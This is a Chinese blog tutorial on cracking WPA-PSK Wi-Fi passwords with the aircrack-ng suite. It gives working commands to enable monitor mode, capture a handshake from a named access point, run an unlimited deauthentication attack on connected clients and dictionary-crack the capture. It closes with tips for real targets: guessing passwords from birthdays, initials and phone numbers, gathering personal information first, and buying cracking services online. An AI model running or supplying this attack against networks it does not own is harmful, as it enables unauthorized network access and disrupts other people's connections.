蜗蜗侠's Blog-关注网络安全移动版

主页 > 黑客/白帽 > 无线安全 >

WPA-PSK无线网络的破解

首先我们需要准备一款kali支持的无线网卡(支持列表),kali linux主机。
 
1.首先我们需要开启网卡的监听模式

airmon-ng start wlan0

WPA-PSK无线网络的破解 - sn0w - 雪花 - sn0w
进入监听模式后网卡会重命名为wlan0mon(kali2.0之前的版本会重命名为 mon)
2.查看周围无线AP的信息。

airodump-ng wlan0mon

WPA-PSK无线网络的破解 - sn0w - 雪花 - sn0w
3.选择相应的目标,抓取握手包。

airodump-ng --bssid C8:3A:35:43:FE:60 -c 1 -w testAP wlan0mon

参数说明: --bssid   目标AP MAC 
    -c         目标AP所在信道
    -w         握手包保存的文件名
WPA-PSK无线网络的破解 - sn0w - 雪花 - sn0w
4.为了顺利抓到握手包,我们需要使用DEAUTH攻击使已经连接的客户端断开并重新连接,以产生握手包。

aireplay-ng -0 0 -a C8:3A:35:43:FE:60 -c C4:8E:8F:61:18:DB wlan0mon

参数解释: -0 Deautenticate攻击模式  0代表无限次
    -a 目标ap的mac
   -c  攻击者网卡mac
WPA-PSK无线网络的破解 - sn0w - 雪花 - sn0w
当我们的抓包窗口抓到握手包,就可以停止了。
WPA-PSK无线网络的破解 - sn0w - 雪花 - sn0w
5.跑包(破解)

aircrack-ng -w /root/Desktop/pwd.txt testAP-03.cap

参数说明: -w  字典路径 + 数据包
 
 WPA-PSK无线网络的破解 - sn0w - 雪花 - sn0w
这个目标AP是我自己搭建的,直接生成了一个简单的字典进行破解,所以并没用太多时间,在实际操作中,这一步会根据密码的复杂程度时间可能会几个小时 几天,如果着急用的建议某宝找专业跑包的。
 
根据朋友的经验密码格式大部分为生日:19xx0xxx、名字首字母+生日:zs19xx0xxx 或者为手机号,所以前期收集一些信息会大大减少破解周期。 
 
 
关于无线的更多知识请参考:http://www.freebuf.com/articles/wireless/58342.html
(责任编辑:蜗蜗侠)